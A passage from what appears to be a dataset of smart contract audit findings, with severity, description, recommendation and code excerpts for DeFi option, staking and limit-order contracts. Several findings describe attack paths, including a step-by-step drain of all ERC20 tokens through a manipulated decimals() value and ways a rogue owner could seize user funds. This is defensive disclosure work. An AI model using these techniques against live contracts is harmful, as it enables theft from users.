}\\n\\n optionToken.mint(msg.sender, amount_);\\n }\\n```\\n\\nexercise function:\\n```\\n function exercise(\\n FixedStrikeOptionToken optionToken_,\\n uint256 amount_\\n ) external override nonReentrant {\\n // rest of code\\n uint256 quoteAmount = amount_.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n\\n if (msg.sender != receiver) {\\n // rest of code\\n }\\n\\n optionToken.burn(msg.sender, amount_);\\n\\n if (call) {\\n // rest of code\\n } else {\\n quoteToken.safeTransfer(msg.sender, quoteAmount);\\n }\\n }\\n```\\n\\nConsider this attack scenario:\\nLet's suppose the `FixedStrikeOptionTeller` holds some DAI tokens.\\nAn attacker can create a malicious payout token of which he can control the `decimals`.\\nThe attacker calls `deploy` to create an option token with malicious payout token and DAI as quote token and `put` option type\\nMake `payoutToken.decimals` return a large number and call `FixedStrikeOptionTeller.create` with input X. Here `quoteAmount` will be calculated as `0`.\\n```\\n// Calculate amount of quote tokens required to mint\\nuint256 quoteAmount = amount_.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n\\n// Transfer quote tokens from user\\n// Check that amount received is not less than amount expected\\n// Handles edge cases like fee-on-transfer tokens (which are not supported)\\nuint256 startBalance = quoteToken.balanceOf(address(this));\\nquoteToken.safeTransferFrom(msg.sender, address(this), quoteAmount);\\n```\\n\\nSo 0 DAI will be pulled from the attacker's account but he will receive X option token.\\nMake `payoutToken.decimals` return a small value and call `FixedStrikeOptionTeller.exercise` with X input. Here `quoteAmount` will be calculated as a very high number (which represents number of DAI tokens). So he will receive huge amount of DAI against his X option tokens when exercise the option or when reclaim the token\\n```\\n// Transfer remaining collateral to receiver\\nuint256 amount = optionToken.totalSupply();\\nif (call) {\\n payoutToken.safeTransfer(receiver, amount);\\n} else {\\n // Calculate amount of quote tokens equivalent to amount at strike price\\n uint256 quoteAmount = amount.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n quoteToken.safeTransfer(receiver, quoteAmount);\\n}\\n```\\n\\nHence, the attacker was able to drain all DAI tokens from the `FixedStrikeOptionTeller` contract. The same mechanism can be repeated to drain all other ERC20 tokens from the `FixedStrikeOptionTeller` contract by changing the return value of the decimal external call","Consider storing the `payoutToken.decimals` value locally instead of fetching it real-time on all `exercise` or `reclaim` calls.\\nor support payout token and quote token whitelist, if the payout token and quote token are permissionless created, there will always be high risk","Anyone can drain `FixedStrikeOptionTeller` contract of all ERC20 tokens. The cost of attack is negligible (only gas cost).\\nHigh impact, high likelyhood.","```\\n function create(\\n FixedStrikeOptionToken optionToken_,\\n uint256 amount_\\n ) external override nonReentrant {\\n // rest of code\\n if (call) {\\n // rest of code\\n } else {\\n uint256 quoteAmount = amount_.mulDiv(strikePrice, 10 ** payoutToken.decimals());\\n // rest of code\\n quoteToken.safeTransferFrom(msg.sender, address(this), quoteAmount);\\n // rest of code\\n }\\n\\n optionToken.mint(msg.sender, amount_);\\n }\\n```\\n" +Blocklisted address can be used to lock the option token minter's fund,medium,"Blocklisted address can be used to lock the option token minter's fund\\nWhen deploy a token via the teller contract, the contract validate that receiver address is not address(0)\\nHowever, a malicious option token creator can save a seemingly favorable strike price and pick a blocklisted address and set the blocklisted address as receiver\\nSome tokens (e.g. USDC, USDT) have a contract level admin controlled address blocklist. If an address is blocked, then transfers to and from that address are forbidden.\\nMalicious or compromised token owners can trap funds in a contract by adding the contract address to the blocklist. This could potentially be the result of regulatory action against the contract itself, against a single user of the contract (e.g. a Uniswap LP), or could also be a part of an extortion attempt against users of the blocked contract.\\nthen user would see the favorable strike price and mint the option token using payout token for call option or use quote token for put option\\nHowever, they can never exercise their option because the transaction would revert when transferring asset to the recevier for call option and transferring asset to the receiver for put option when exercise the option.\\n```\\n\\n```\\n\\nthe usre's fund that used to mint the option are locked","Valid that receiver is not blacklisted when create and deploy the option token or add an expiry check, if after the expiry the receiver does not reclaim the fund, allows the option minter to burn their token in exchange for their fund",Blocklisted receiver address can be used to lock the option token minter's fund,```\\n\\n```\\n +Loss of option token from Teller and reward from OTLM if L2 sequencer goes down,medium,"Loss of option token from Teller and reward from OTLM if L2 sequencer goes down\\nIn the current implementation, if the option token expires, the user is not able to exerise the option at strike price\\n```\\n // Validate that option token is not expired\\n if (uint48(block.timestamp) >= expiry) revert Teller_OptionExpired(expiry);\\n```\\n\\nif the option token expires, the user lose rewards from OTLM as well when claim the reward\\n```\\n function _claimRewards() internal returns (uint256) {\\n // Claims all outstanding rewards for the user across epochs\\n // If there are unclaimed rewards from epochs where the option token has expired, the rewards are lost\\n\\n // Get the last epoch claimed by the user\\n uint48 userLastEpoch = lastEpochClaimed[msg.sender];\\n```\\n\\nand\\n```\\n // If the option token has expired, then the rewards are zero\\n if (uint256(optionToken.expiry()) < block.timestamp) return 0;\\n```\\n\\nAnd in the onchain context, the protocol intends to deploy the contract in arbitrum and optimsim\\n```\\nQ: On what chains are the smart contracts going to be deployed?\\nMainnet, Arbitrum, Optimism\\n```\\n\\nHowever, If Arbitrum and optimism layer 2 network, the sequencer is in charge of process the transaction\\nFor example, the recent optimism bedrock upgrade cause the sequencer not able to process transaction for a hew hours\\nBedrock Upgrade According to the official announcement, the upgrade will require 2-4 hours of downtime for OP Mainnet, during which there will be downtime at the chain and infrastructure level while the old sequencer is spun down and the Bedrock sequencer starts up.\\nTransactions, deposits, and withdrawals will also remain unavailable for the duration, and the chain will not be progressing. While the read access across most OP Mainnet nodes will stay online, users may encounter a slight decrease in performance during the migration process.\\nIn Arbitrum\\nArbitrum Goes Down Citing Sequencer Problems Layer 2 Arbitrum suffers 10 hour outage.\\nand\\nEthereum layer-2 (L2) scaling solution Arbitrum stopped processing transactions on June 7 because its sequencer faced a bug in the batch poster. The incident only lasted for an hour.\\nIf the option expires during the sequencer down time, the user basically have worthless option token because they cannot exercise the option at strike price\\nthe user would lose his reward as option token from OTLM.sol, which defeats the purpose of use OTLM to incentive user to provide liquidity",chainlink has a sequencer up feed\\nconsider integrate the up time feed and give user extra time to exercise token and claim option token reward if the sequencer goes down,Loss of option token from Teller and reward from OTLM if L2 sequencer goes down,```\\n // Validate that option token is not expired\\n if (uint48(block.timestamp) >= expiry) revert Teller_OptionExpired(expiry);\\n```\\n +Use A's staked token balance can be used to mint option token as reward for User B if the payout token equals to the stake token,medium,"User's staked token balance can be used to mint option token as reward if the payout token equals to the stake token, can cause user to loss fund\\nIn OTLM, user can stake stakeToken in exchange for the option token minted from the payment token\\nwhen staking, we transfer the stakedToken in the OTLM token\\n```\\n// Increase the user's stake balance and the total balance\\nstakeBalance[msg.sender] = userBalance + amount_;\\ntotalBalance += amount_;\\n\\n// Transfer the staked tokens from the user to this contract\\nstakedToken.safeTransferFrom(msg.sender, address(this), amount_);\\n```\\n\\nbefore the stake or unstake or when we are calling claimReward\\nwe are calling _claimRewards -> _claimEpochRewards -> we use payout token to mint and create option token as reward\\n```\\n payoutToken.approve(address(optionTeller), rewards);\\n optionTeller.create(optionToken, rewards);\\n\\n // Transfer rewards to sender\\n ERC20(address(optionToken)).safeTransfer(msg.sender, rewards);\\n```\\n\\nthe problem is, if the stake token and the payout token are the same token, the protocol does not distingush the balance of the stake token and the balance of payout token\\nsuppose both stake token and payout token are USDC\\nsuppose user A stake 100 USDC\\nsuppose user B stake 100 USDC\\ntime passed, user B accure 10 token unit reward\\nnow user B can claimRewards,\\nthe protocol user 10 USDC to mint option token for B\\nthe OTLM has 190 USDC\\nif user A and user B both call emergencyUnstakeAll, whoeve call this function later will suffer a revert and he is not able to even give up the reward and claim their staked balance back\\nbecause a part of the his staked token balance is treated as the payout token to mint option token reward for other user",Seperate the accounting of the staked user and the payout token or check that staked token is not payout token when creating the OTLM.sol,"If there are insufficient payout token in the OTLM, the expected behavior is that the transaction revert when claim the reward and when the code use payout token to mint option token\\nand in the worst case, user can call emergencyUnstakeAll to get their original staked balane back and give up their reward\\nhowever, if the staked token is the same as the payout token,\\na part of the user staked token can be mistakenly and constantly mint as option token reward for his own or for other user and eventually when user call emergencyUnstakeAll, there will be insufficient token balance and transaction revert\\nso user will not able to get their staked token back","```\\n// Increase the user's stake balance and the total balance\\nstakeBalance[msg.sender] = userBalance + amount_;\\ntotalBalance += amount_;\\n\\n// Transfer the staked tokens from the user to this contract\\nstakedToken.safeTransferFrom(msg.sender, address(this), amount_);\\n```\\n" +IERC20(token).approve revert if the underlying ERC20 token approve does not return boolean,medium,"IERC20(token).approve revert if the underlying ERC20 token approve does not return boolean\\nWhen transferring the token, the protocol use safeTransfer and safeTransferFrom\\nbut when approving the payout token, the safeApprove is not used\\nfor non-standard token such as USDT,\\ncalling approve will revert because the solmate ERC20 enforce the underlying token return a boolean\\n```\\n function approve(address spender, uint256 amount) public virtual returns (bool) {\\n allowance[msg.sender][spender] = amount;\\n\\n emit Approval(msg.sender, spender, amount);\\n\\n return true;\\n }\\n```\\n\\nwhile the token such as USDT does not return boolean",Use safeApprove instead of approve,USDT or other ERC20 token that does not return boolean for approve is not supported as the payout token,"```\\n function approve(address spender, uint256 amount) public virtual returns (bool) {\\n allowance[msg.sender][spender] = amount;\\n\\n emit Approval(msg.sender, spender, amount);\\n\\n return true;\\n }\\n```\\n" +Division before multiplication result in loss of token reward if the reward update time elapse is small,medium,"Division before multiplication result in loss of token reward\\nWhen calcuting the reward, we are calling\\n```\\n function currentRewardsPerToken() public view returns (uint256) {\\n // Rewards do not accrue if the total balance is zero\\n if (totalBalance == 0) return rewardsPerTokenStored;\\n\\n // @audit\\n // loss of precision\\n // The number of rewards to apply is based on the reward rate and the amount of time that has passed since the last reward update\\n uint256 rewardsToApply = ((block.timestamp - lastRewardUpdate) * rewardRate) /\\n REWARD_PERIOD;\\n\\n // The rewards per token is the current rewards per token plus the rewards to apply divided by the total staked balance\\n return rewardsPerTokenStored + (rewardsToApply * 10 ** stakedTokenDecimals) / totalBalance;\\n }\\n```\\n\\nthe precision loss can be high because the accumulated reward depends on the time elapse:\\n(block.timestamp - lastRewardUpdate)\\nand the REWARD_PERIOD is hardcoded to one days:\\n```\\n /// @notice Amount of time (in seconds) that the reward rate is distributed over\\n uint48 public constant REWARD_PERIOD = uint48(1 days);\\n```\\n\\nif the time elapse is short and the currentRewardsPerToken is updated frequently, the precision loss can be heavy and even rounded to zero\\nthe lower the token precision, the heavier the precision loss\\nSome tokens have low decimals (e.g. USDC has 6). Even more extreme, some tokens like Gemini USD only have 2 decimals.\\nconsider as extreme case, if the reward token is Gemini USD, the reward rate is set to 1000 * 10 = 10 ** 4 = 10000\\nif the update reward keep getting called within 8 seconds\\n8 * 10000 / 86400 is already rounded down to zero and no reward is accuring for user",Avoid division before multiplcation and only perform division at last,Division before multiplication result in loss of token reward if the reward update time elapse is small,```\\n function currentRewardsPerToken() public view returns (uint256) {\\n // Rewards do not accrue if the total balance is zero\\n if (totalBalance == 0) return rewardsPerTokenStored;\\n\\n // @audit\\n // loss of precision\\n // The number of rewards to apply is based on the reward rate and the amount of time that has passed since the last reward update\\n uint256 rewardsToApply = ((block.timestamp - lastRewardUpdate) * rewardRate) /\\n REWARD_PERIOD;\\n\\n // The rewards per token is the current rewards per token plus the rewards to apply divided by the total staked balance\\n return rewardsPerTokenStored + (rewardsToApply * 10 ** stakedTokenDecimals) / totalBalance;\\n }\\n```\\n +FixedStrikeOptionTeller: create can be invoked when block.timestamp == expiry but exercise reverts,medium,"In `FixedStrikeOptionTeller` contract, new option tokens can be minted when `block.timestamp == expiry` but these option tokens cannot be exercised even in the same transaction.\\nThe `create` function has this statement:\\n```\\n if (uint256(expiry) < block.timestamp) revert Teller_OptionExpired(expiry);\\n```\\n\\nThe `exercise` function has this statement:\\n```\\n if (uint48(block.timestamp) >= expiry) revert Teller_OptionExpired(expiry);\\n```\\n\\nNotice the `>=` operator which means when `block.timestamp == expiry` the `exercise` function reverts.\\nThe `FixedStrikeOptionTeller.create` function is invoked whenever a user claims his staking rewards using `OTLM.claimRewards` or `OTLM.claimNextEpochRewards`. (here)\\nSo if a user claims his rewards when `block.timestamp == expiry` he receives the freshly minted option tokens but he cannot exercise these option tokens even in the same transaction (or same block).\\nMoreover, since the receiver do not possess these freshly minted option tokens, he cannot `reclaim` them either (assuming `reclaim` function contains the currently missing `optionToken.burn` statement).",Consider maintaining a consistent timestamp behaviour. Either prevent creation of option tokens at expiry or allow them to be exercised at expiry.,Option token will be minted to user but he cannot exercise them. Receiver cannot reclaim them as he doesn't hold that token amount.\\nThis leads to loss of funds as the minted option tokens become useless. Also the scenario of users claiming at expiry is not rare.,```\\n if (uint256(expiry) < block.timestamp) revert Teller_OptionExpired(expiry);\\n```\\n +stake() missing set lastEpochClaimed when userBalance equal 0,medium,"because `stake()` don't set `lastEpochClaimed[user] = last epoch` if `userBalance` equal 0 So all new stake user must loop from 0 to `last epoch` for `_claimRewards()` As the epoch gets bigger and bigger it will waste a lot of GAS, which may eventually lead to `GAS_OUT`\\nin `stake()`, when the first-time `stake()` only `rewardsPerTokenClaimed[msg.sender]` but don't set `lastEpochClaimed[msg.sender]`\\n```\\n function stake(\\n uint256 amount_,\\n bytes calldata proof_\\n ) external nonReentrant requireInitialized updateRewards tryNewEpoch {\\n// rest of code\\n uint256 userBalance = stakeBalance[msg.sender];\\n if (userBalance > 0) {\\n // Claim outstanding rewards, this will update the rewards per token claimed\\n _claimRewards();\\n } else {\\n // Initialize the rewards per token claimed for the user to the stored rewards per token\\n rewardsPerTokenClaimed[msg.sender] = rewardsPerTokenStored;\\n }\\n\\n // Increase the user's stake balance and the total balance\\n stakeBalance[msg.sender] = userBalance + amount_;\\n totalBalance += amount_;\\n\\n // Transfer the staked tokens from the user to this contract\\n stakedToken.safeTransferFrom(msg.sender, address(this), amount_);\\n }\\n```\\n\\nso every new staker , needs claims from 0\\n```\\n function _claimRewards() internal returns (uint256) {\\n // Claims all outstanding rewards for the user across epochs\\n // If there are unclaimed rewards from epochs where the option token has expired, the rewards are lost\\n\\n // Get the last epoch claimed by the user\\n uint48 userLastEpoch = lastEpochClaimed[msg.sender];\\n\\n // If the last epoch claimed is equal to the current epoch, then only try to claim for the current epoch\\n if (userLastEpoch == epoch) return _claimEpochRewards(epoch);\\n\\n // If not, then the user has not claimed all rewards\\n // Start at the last claimed epoch because they may not have completely claimed that epoch\\n uint256 totalRewardsClaimed;\\n for (uint48 i = userLastEpoch; i <= epoch; i++) {\\n // For each epoch that the user has not claimed rewards for, claim the rewards\\n totalRewardsClaimed += _claimEpochRewards(i);\\n }\\n\\n return totalRewardsClaimed;\\n }\\n```\\n\\nWith each new addition of `epoch`, the new stake must consumes a lot of useless loops, from loop 0 to last `epoch` When `epoch` reaches a large size, it will result in GAS_OUT and the method cannot be executed","```\\n function stake(\\n uint256 amount_,\\n bytes calldata proof_\\n ) external nonReentrant requireInitialized updateRewards tryNewEpoch {\\n// rest of code\\n if (userBalance > 0) {\\n // Claim outstanding rewards, this will update the rewards per token claimed\\n _claimRewards();\\n } else {\\n // Initialize the rewards per token claimed for the user to the stored rewards per token\\n rewardsPerTokenClaimed[msg.sender] = rewardsPerTokenStored;\\n+ lastEpochClaimed[msg.sender] = epoch;\\n }\\n```\\n","When the `epoch` gradually increases, the new take will waste a lot of GAS When it is very large, it will cause GAS_OUT","```\\n function stake(\\n uint256 amount_,\\n bytes calldata proof_\\n ) external nonReentrant requireInitialized updateRewards tryNewEpoch {\\n// rest of code\\n uint256 userBalance = stakeBalance[msg.sender];\\n if (userBalance > 0) {\\n // Claim outstanding rewards, this will update the rewards per token claimed\\n _claimRewards();\\n } else {\\n // Initialize the rewards per token claimed for the user to the stored rewards per token\\n rewardsPerTokenClaimed[msg.sender] = rewardsPerTokenStored;\\n }\\n\\n // Increase the user's stake balance and the total balance\\n stakeBalance[msg.sender] = userBalance + amount_;\\n totalBalance += amount_;\\n\\n // Transfer the staked tokens from the user to this contract\\n stakedToken.safeTransferFrom(msg.sender, address(this), amount_);\\n }\\n```\\n" +"claimRewards() If a rewards is too small, it may block other epochs",medium,"When `claimRewards()`, if some `rewards` is too small after being round down to 0 If `payoutToken` does not support transferring 0, it will block the subsequent epochs\\nThe current formula for calculating rewards per cycle is as follows.\\n```\\n function _claimEpochRewards(uint48 epoch_) internal returns (uint256) {\\n// rest of code\\n uint256 rewards = ((rewardsPerTokenEnd - userRewardsClaimed) * stakeBalance[msg.sender]) /\\n 10 ** stakedTokenDecimals;\\n // Mint the option token on the teller\\n // This transfers the reward amount of payout tokens to the option teller in exchange for the amount of option tokens\\n payoutToken.approve(address(optionTeller), rewards);\\n optionTeller.create(optionToken, rewards);\\n```\\n\\nCalculate `rewards` formula : uint256 `rewards` = ((rewardsPerTokenEnd - userRewardsClaimed) * stakeBalance[msg.sender]) /10 ** stakedTokenDecimals;\\nWhen `rewardsPerTokenEnd` is very close to `userRewardsClaimed`, `rewards` is likely to be round downs to 0 Some tokens do not support transfer(amount=0) This will revert and lead to can't claims","```\\n function _claimEpochRewards(uint48 epoch_) internal returns (uint256) {\\n// rest of code..\\n\\n uint256 rewards = ((rewardsPerTokenEnd - userRewardsClaimed) * stakeBalance[msg.sender]) /\\n 10 ** stakedTokenDecimals;\\n+ if (rewards == 0 ) return 0;\\n // Mint the option token on the teller\\n // This transfers the reward amount of payout tokens to the option teller in exchange for the amount of option tokens\\n payoutToken.approve(address(optionTeller), rewards);\\n optionTeller.create(optionToken, rewards);\\n```\\n",Stuck `claimRewards()` when the rewards of an epoch is 0,"```\\n function _claimEpochRewards(uint48 epoch_) internal returns (uint256) {\\n// rest of code\\n uint256 rewards = ((rewardsPerTokenEnd - userRewardsClaimed) * stakeBalance[msg.sender]) /\\n 10 ** stakedTokenDecimals;\\n // Mint the option token on the teller\\n // This transfers the reward amount of payout tokens to the option teller in exchange for the amount of option tokens\\n payoutToken.approve(address(optionTeller), rewards);\\n optionTeller.create(optionToken, rewards);\\n```\\n" +Lack of segregation between users' assets and collected fees resulting in loss of funds for the users,high,"The users' assets are wrongly sent to the owner due to a lack of segregation between users' assets and collected fees, which might result in an irreversible loss of assets for the victims.\\nGLX uses the Chainlink Automation to execute the `LimitOrderRegistry.performUpkeep` function when there are orders that need to be fulfilled. The `LimitOrderRegistry` contract must be funded with LINK tokens to keep the operation running.\\nTo ensure the LINK tokens are continuously replenished and funded, users must pay a fee denominated in Native ETH or ERC20 WETH tokens on orders claiming as shown below. The collected ETH fee will be stored within the `LimitOrderRegistry` contract.\\n```\\nFile: LimitOrderRegistry.sol\\n function claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n..SNIP..\\n // Transfer tokens owed to user.\\n tokenOut.safeTransfer(user, owed);\\n\\n // Transfer fee in.\\n address sender = _msgSender();\\n if (msg.value >= userClaim.feePerUser) {\\n // refund if necessary.\\n uint256 refund = msg.value - userClaim.feePerUser;\\n if (refund > 0) sender.safeTransferETH(refund);\\n } else {\\n WRAPPED_NATIVE.safeTransferFrom(sender, address(this), userClaim.feePerUser);\\n // If value is non zero send it back to caller.\\n if (msg.value > 0) sender.safeTransferETH(msg.value);\\n }\\n..SNIP..\\n```\\n\\nTo retrieve the ETH fee collected, the owner will call the `LimitOrderRegistry.withdrawNative` function that will send all the Native ETH and ERC20 WETH tokens within the `LimitOrderRegistry` contract to the owner's address. After executing this function, the Native ETH and ERC20 WETH tokens on this contract will be zero and wiped out.\\n```\\nFile: LimitOrderRegistry.sol\\n function withdrawNative() external onlyOwner {\\n uint256 wrappedNativeBalance = WRAPPED_NATIVE.balanceOf(address(this));\\n uint256 nativeBalance = address(this).balance;\\n // Make sure there is something to withdraw.\\n if (wrappedNativeBalance == 0 && nativeBalance == 0) revert LimitOrderRegistry__ZeroNativeBalance();\\n\\n // transfer wrappedNativeBalance if it exists\\n if (wrappedNativeBalance > 0) WRAPPED_NATIVE.safeTransfer(owner, wrappedNativeBalance);\\n // transfer nativeBalance if it exists\\n if (nativeBalance > 0) owner.safeTransferETH(nativeBalance);\\n }\\n```\\n\\nMost owners will automate replenishing the `LimitOrderRegistry` contract with LINK tokens to ensure its balance does not fall below zero and for ease of maintenance. For instance, a certain percentage of the collected ETH fee (e.g., 50%) will be swapped immediately to LINK tokens on a DEX upon collection and transferred the swapped LINK tokens back to the `LimitOrderRegistry` contract. The remaining will be spent to cover operation and maintenance costs.\\nHowever, the issue is that there are many Uniswap V3 pools where their token pair consists of ETH/WETH. In fact, most large pools in Uniswap V3 will consist of ETH/WETH. For instance, the following Uniswap pools consist of ETH/WETH as one of the pool tokens:\\nUSDC / ETH (0.05% Fee) (TLV: $284 million)\\nWBTC / ETH (0.3% Fee) (TLV: $227 million)\\nUSDC / ETH (0.3% Fee) (TLV: $88 million)\\nDAI / ETH (0.3% Fee) (TLV: $14 million)\\nAssume that the owner has configured and setup the `LimitOrderRegistry` contract to work with the Uniswap DAI/ETH pool, and the current price of the DAI/ETH pool is 1,500 DAI/ETH.\\nBob submit a new Buy Limit Order swapping DAI to ETH at the price of 1,000 DAI/ETH. Bob would deposit 1,000,000 DAI to the `LimitOrderRegistry` contract.\\nWhen Bob's Buy Limit Order is ITM and fulfilled, 1000 ETH/WETH will be sent to and stored within the `LimitOrderRegistry` contract.\\nThe next step that Bob must do to claim the swapped 1000 ETH/WETH is to call the `LimitOrderRegistry.claimOrder` function, which will collect the fee and transfer the swapped 1000 ETH/WETH to Bob.\\nUnfortunately, before Bob could claim his swapped ETH/WETH, the `LimitOrderRegistry.withdrawNative` function is triggered by the owner or the owner's bots. As noted earlier, when the `LimitOrderRegistry.withdrawNative` function is triggered, all the Native ETH and ERC20 WETH tokens on this contract will be transferred to the owner's address. As a result, Bob's 1000 swapped ETH/WETH stored within the `LimitOrderRegistry` contract are sent to the owner's address, and the balance of ETH/WETH in the `LimitOrderRegistry` contract is zero.\\nWhen Bob calls the `LimitOrderRegistry.claimOrder` function, the transaction will revert because insufficient ETH/WETH is left in the `LimitOrderRegistry` contract.\\nUnfortunately for Bob, there is no way to recover back his ETH/WETH that is sent to the owner's address. Following outline some of the possible scenarios where this could happen:\\nThe owners set up their infrastructure to automatically swap a portion or all the ETH/WETH received to LINK tokens and transfer them to the `LimitOrderRegistry` contract, and there is no way to retrieve the deposited LINK tokens from the `LimitOrderRegistry` contract even if the owner wishes to do so as there is no function within the contract to allow this action.\\nThe owners set up their infrastructure to automatically swap a small portion of ETH/WETH received to LINK tokens and send the rest of the ETH/WETH to 100 investors/DAO members' addresses. So, it is no guarantee that the investors/DAO members will return the ETH/WETH to Bob.","Consider implementing one of the following solutions to mitigate the issue:\\nSolution 1 - Only accept Native ETH as fee\\nUniswap V3 pool stored ETH as Wrapped ETH (WETH) ERC20 token internally. When the `collect` function is called against the pool, WETH ERC20 tokens are returned to the caller. Thus, the most straightforward way to mitigate this issue is to update the contract to `collect` the fee in Native ETH only.\\nIn this case, there will be a clear segregation between users' assets (WETH) and owner's fee (Native ETH)\\n```\\nfunction withdrawNative() external onlyOwner {\\n// Remove the line below\\n uint256 wrappedNativeBalance = WRAPPED_NATIVE.balanceOf(address(this));\\n uint256 nativeBalance = address(this).balance;\\n // Make sure there is something to withdraw.\\n// Remove the line below\\n if (wrappedNativeBalance == 0 && nativeBalance == 0) revert LimitOrderRegistry__ZeroNativeBalance();\\n// Add the line below\\n if (nativeBalance == 0) revert LimitOrderRegistry__ZeroNativeBalance();\\n\\n// Remove the line below\\n // transfer wrappedNativeBalance if it exists\\n// Remove the line below\\n if (wrappedNativeBalance > 0) WRAPPED_NATIVE.safeTransfer(owner, wrappedNativeBalance);\\n // transfer nativeBalance if it exists\\n if (nativeBalance > 0) owner.safeTransferETH(nativeBalance);\\n}\\n```\\n\\n```\\nfunction claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n..SNIP..\\n // Transfer tokens owed to user.\\n tokenOut.safeTransfer(user, owed);\\n\\n // Transfer fee in.\\n address sender = _msgSender();\\n if (msg.value >= userClaim.feePerUser) {\\n // refund if necessary.\\n uint256 refund = msg.value // Remove the line below\\n userClaim.feePerUser;\\n if (refund > 0) sender.safeTransferETH(refund); \\n } else {\\n// Remove the line below\\n WRAPPED_NATIVE.safeTransferFrom(sender, address(this), userClaim.feePerUser);\\n// Remove the line below\\n // If value is non zero send it back to caller.\\n// Remove the line below\\n if (msg.value > 0) sender.safeTransferETH(msg.value);\\n// Add the line below\\n revert LimitOrderRegistry__InsufficientFee;\\n }\\n..SNIP..\\n```\\n\\nSolution 2 - Define state variables to keep track of the collected fee\\nConsider defining state variables to keep track of the collected fee so that the fee will not mix up with users' assets.\\n```\\nfunction claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n..SNIP..\\n // Transfer fee in.\\n address sender = _msgSender();\\n if (msg.value >= userClaim.feePerUser) {\\n// Add the line below\\n collectedNativeETHFee // Add the line below\\n= userClaim.feePerUser\\n // refund if necessary.\\n uint256 refund = msg.value - userClaim.feePerUser;\\n if (refund > 0) sender.safeTransferETH(refund);\\n } else {\\n// Add the line below\\n collectedWETHFee // Add the line below\\n= userClaim.feePerUser\\n WRAPPED_NATIVE.safeTransferFrom(sender, address(this), userClaim.feePerUser);\\n // If value is non zero send it back to caller.\\n if (msg.value > 0) sender.safeTransferETH(msg.value);\\n }\\n..SNIP..\\n```\\n\\n```\\nfunction withdrawNative() external onlyOwner {\\n// Remove the line below\\n uint256 wrappedNativeBalance = WRAPPED_NATIVE.balanceOf(address(this));\\n// Remove the line below\\n uint256 nativeBalance = address(this).balance;\\n// Add the line below\\n uint256 wrappedNativeBalance = collectedWETHFee;\\n// Add the line below\\n uint256 nativeBalance = collectedNativeETHFee;\\n// Add the line below\\n collectedWETHFee = 0; // clear the fee\\n// Add the line below\\n collectedNativeETHFee = 0; // clear the fee\\n // Make sure there is something to withdraw.\\n if (wrappedNativeBalance == 0 && nativeBalance == 0) revert LimitOrderRegistry__ZeroNativeBalance();\\n\\n // transfer wrappedNativeBalance if it exists\\n if (wrappedNativeBalance > 0) WRAPPED_NATIVE.safeTransfer(owner, wrappedNativeBalance);\\n // transfer nativeBalance if it exists\\n if (nativeBalance > 0) owner.safeTransferETH(nativeBalance);\\n}\\n```\\n",Loss of assets for the users,"```\\nFile: LimitOrderRegistry.sol\\n function claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n..SNIP..\\n // Transfer tokens owed to user.\\n tokenOut.safeTransfer(user, owed);\\n\\n // Transfer fee in.\\n address sender = _msgSender();\\n if (msg.value >= userClaim.feePerUser) {\\n // refund if necessary.\\n uint256 refund = msg.value - userClaim.feePerUser;\\n if (refund > 0) sender.safeTransferETH(refund);\\n } else {\\n WRAPPED_NATIVE.safeTransferFrom(sender, address(this), userClaim.feePerUser);\\n // If value is non zero send it back to caller.\\n if (msg.value > 0) sender.safeTransferETH(msg.value);\\n }\\n..SNIP..\\n```\\n" +Users' funds could be stolen or locked by malicious or rouge owners,high,"Users' funds could be stolen or locked by malicious or rouge owners.\\nIn the contest's README, the following was mentioned.\\nQ: Is the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\nrestricted. the owner should not be able to steal funds.\\nIt was understood that the owner is not ""trusted"" and should not be able to steal funds. Thus, it is fair to assume that the sponsor is keen to know if there are vulnerabilities that could allow the owner to steal funds or, to a lesser extent, lock the user's funds.\\nMany control measures are implemented within the protocol to prevent the owner from stealing or locking the user's funds.\\nHowever, based on the review of the codebase, there are still some ""loopholes"" that the owner can exploit to steal funds or indirectly cause losses to the users. Following is a list of methods/tricks to do so.\\nMethod 1 - Use the vulnerable `withdrawNative` function\\nOnce the user's order is fulfilled, the swapped ETH/WETH will be sent to the contract awaiting the user's claim. However, the owner can call the `withdrawNative` function, which will forward all the Native ETH and Wrapped ETH in the contract to the owner's address due to another bug (""Lack of segregation between users' assets and collected fees resulting in loss of funds for the users"") that I highlighted in another of my report.\\nMethod 2 - Add a malicious custom price feed\\n```\\nFile: LimitOrderRegistry.sol\\n function setFastGasFeed(address feed) external onlyOwner {\\n fastGasFeed = feed;\\n }\\n```\\n\\nThe owner can create a malicious price feed contract and configure the `LimitOrderRegistry` to use it by calling the `setFastGasFeed` function.\\n```\\nFile: LimitOrderRegistry.sol\\n function performUpkeep(bytes calldata performData) external {\\n (UniswapV3Pool pool, bool walkDirection, uint256 deadline) = abi.decode(\\n performData,\\n (UniswapV3Pool, bool, uint256)\\n );\\n\\n if (address(poolToData[pool].token0) == address(0)) revert LimitOrderRegistry__PoolNotSetup(address(pool));\\n\\n PoolData storage data = poolToData[pool];\\n\\n // Estimate gas cost.\\n uint256 estimatedFee = uint256(upkeepGasLimit * getGasPrice());\\n```\\n\\nWhen fulfilling an order, the `getGasPrice()` function will fetch the gas price from the malicious price feed that will report an extremely high price (e.g., 100000 ETH), causing the `estimatedFee` to be extremely high. When users attempt to claim the order, they will be forced to pay an outrageous fee, which the users cannot afford to do so. Thus, the users have to forfeit their orders, and they will lose their swapped tokens.","Consider implementing the following measures to reduce the risk of malicious/rouge owners from stealing or locking the user's funds.\\nTo mitigate the issue caused by the vulnerable `withdrawNative` function. Refer to my recommendation in my report titled ""Lack of segregation between users' assets and collected fees resulting in loss of funds for the users"".\\nTo mitigate the issue of the owner adding a malicious custom price feed, consider performing some sanity checks against the value returned from the price feed. For instance, it should not be larger than the `MAX_GAS_PRICE` constant. If it is larger than `MAX_GAS_PRICE` constant, fallback to the user-defined gas feed, which is constrained to be less than `MAX_GAS_PRICE`.",Users' funds could be stolen or locked by malicious or rouge owners.,```\\nFile: LimitOrderRegistry.sol\\n function setFastGasFeed(address feed) external onlyOwner {\\n fastGasFeed = feed;\\n }\\n```\\n +Owners will incur loss and bad debt if the value of a token crashes,medium,"If the value of the swapped tokens crash, many users will choose not to claim the orders, which result in the owner being unable to recoup back the gas fee the owner has already paid for automating the fulfillment of the orders, incurring loss and bad 